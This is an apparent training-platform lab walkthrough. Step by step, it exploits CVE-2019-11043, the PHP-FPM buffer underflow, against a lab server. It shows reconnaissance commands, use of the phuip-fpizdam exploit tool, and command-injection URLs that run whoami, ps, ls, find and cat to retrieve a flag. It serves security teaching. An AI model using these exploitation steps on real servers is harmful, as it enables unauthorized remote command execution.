[CVE-2019–11043]: Exploit ...
    08 September 22

    [CVE-2019–11043]: Exploiting the PHuiP-FPizdaM Vulnerability

    Posted byINE

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    This bug shows how web vulnerability can lead to a memory corruption vulnerability (buffer underflow) resulting in OS command execution!




    In 2019, an interesting bug was discovered in PHP-FPM. It was a buffer-underflow attack, and therefore, it happened to be a bug that required knowledge of both binary and web domains for successful exploitation (when trying it manually).

    In this lab, we will learn how to detect and exploit the PHuiP-FPizdaM RCE vulnerability (CVE-2019–11043) in a realistic environment and leverage it for running arbitrary commands on the compromised server.

    Lab Environment

    In this lab writeup, learn to exploit a buffer underflow bug in PHP-FPM and leverage it to get OS command execution on the target machine located at http://demo.ine.local.

    Objective: Exploit the PHuiP-FPizdaM vulnerability (CVE-2019–11043) and retrieve the flag!


    Challenge Link:



    The best tools for this lab are:


    Step 1: Open the lab link to access the Kali GUI instance.


    Step 2: Check if the provided machine/domain is reachable.


    ping -c3 demo.ine.local


    The provided machine is reachable.

    Step 3: Check open ports on the provided machine.


    nmap -sS -sV demo.ine.local


    Port 80 (HTTP) is open on the target machine.

    Step 4: Explore the web pages hosted on the webserver.

    Open the following URL in the browser:

    URL: http://demo.ine.local


    A coming soon page is hosted on the target server.

    Step 5: Check the request headers for http://demo.ine.local and identify the vulnerability.

    Let’s use curl to view the request headers:


    curl -I demo.ine.local


    Notice that the server is running Nginx (version 1.14.0) with PHP (version 7.1.33dev).

    This means we are probably viewing the index.php page.

    Open the following URL in the browser:

    URL: http://demo.ine.local/index.php


    Search the following query:

    php/7.1.33 dev exploit


    Notice the response page contains references of an RCE issue in PHP and has been assigned CVE-2019–11043. It applies to certain versions of PHP 7 installations running on NGINX with PHP-FPM enabled.

    Open the Qualys post link and navigate to Vulnerability Scope & Details section:


    It states that:

    PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 are vulnerable according to CVE-2019–11043.

    Since NGINX is serving PHP pages, it must have PHP-FPM enabled. Also, we have identified the PHP version used by the webserver (version 7.1.33dev) to be vulnerable to the CVE mentioned above.

    Step 6: Check the usage for the phuip-fpizdam tool.


    The researcher who identified this issue had developed a tool named phuip-fpizdam to perform one-shot exploitation of this vulnerability.

    The phuip-fpizdam tool is located in /root/Desktop/tools directory:


    ls /root/Desktop/tools

    ls /root/Desktop/tools/phuip-fpizdam


    Run this tool without any command-line arguments:




    This tool expects the target URL, and we can specify a number of flags to it.

    Notice the — only-qsl flag. It helps in identifying if the server is vulnerable to this issue.

    Step 7: Detect if the target web server is vulnerable.

    We have already identified that the preconditions for this exploit match up perfectly (certain versions of PHP 7 running on NGINX with PHP-FPM enabled).

    Now we can use the phuip-fpizdam tool to confirm if the target is vulnerable or not:


    /root/Desktop/tools/phuip-fpizdam --only-qsl http://demo.ine.local/index.php


    Notice the target server is reported to be vulnerable to the PHuiP-FPizdaM vulnerability.

    Step 8: Exploit the vulnerability to gain code execution on the target server.

    This time, we will run the phuip-fpizdam tool with the target URL and without any flags:


    /root/Desktop/tools/phuip-fpizdam http://demo.ine.local/index.php


    Notice the exploitation was successful. To run shell commands on the target server, we need to append the provided query parameter to the request URL.

    Open the following URL in the web browser:

    URL: http://demo.ine.local/index.php?a=/bin/sh+-c+%27which+which%27&


    Nothing is returned on the page.

    Refresh the page:


    This time, we got back the results from the issued command.

    Note: Chances are that you might have to refresh the URL a couple of times before you get any results. It is because several PHP-FPM workers are running on the server, and only some of them got infected. Therefore, only if the infected worker processes serve the request will our commands be executed. Otherwise, the commands won’t be executed.

    Step 9: Run commands on the compromised web server.

    Now that we have compromised the web server, we can run shell commands on it and perform some recon and enumeration.

    Open the following URL to run the whoami command:

    URL: http://demo.ine.local/index.php?a=whoami


    We are running commands as the www-data user.

    Inspect the process listing:

    URL: http://demo.ine.local/index.php?a=ps%20aux


    Notice the process listing is distorted. It is because the web browsers disregard the newline character and instead require the \<br /\> tag (line-break) to insert the line breaks. But since the output of the ps aux command contains newlines and not the \<br /\> tags, we see the output in a non-readable format.

    We can check the page source instead (press CTRL+U) to view the output in a much more readable format:


    Now the output looks good.

    Note: As explained earlier, you might not get the output from the issued commands in one go and might have to resend your requests.

    Check the current working directory:

    URL: http://demo.ine.local/index.php?a=pwd


    The current working directory is /var/www/html.

    Check the list of files present in the current working directory (the webroot directory):

    URL: http://demo.ine.local/index.php?a=ls%20-al


    Step 10: Retrieve the flag from the target server.

    Find the flag using the following command:


    find / -iname *FLAG* 2>/dev/null

    To issue this command on the server, open the following URL in the browser:


    http://demo.ine.local/index.php?a=find / -iname *FLAG* 2>/dev/null



    The flag is present in the /FLAG file.

    Retrieve the flag:

    URL: http://demo.ine.local/index.php?a=cat%20/FLAG


    FLAG: 2867dd5248874bb7a510f6ab74318bda


    With that, we conclude this interesting PHP-FPM (buffer-underflow) bug dubbed as PHuiP-FPizdaM.

    We have learned how to detect and exploit this vulnerability using the phuip-fpizdam tool.

    If you are curious about the intrinsic details, check out the detailed analysis done by the security researcher Orange Tsai on his blog.


    Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Hey! Don’t miss anything - subscribe to our newsletter!

    © 2022 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.
    instagram Logofacebook Logotwitter Logolinkedin Logoyoutube Logo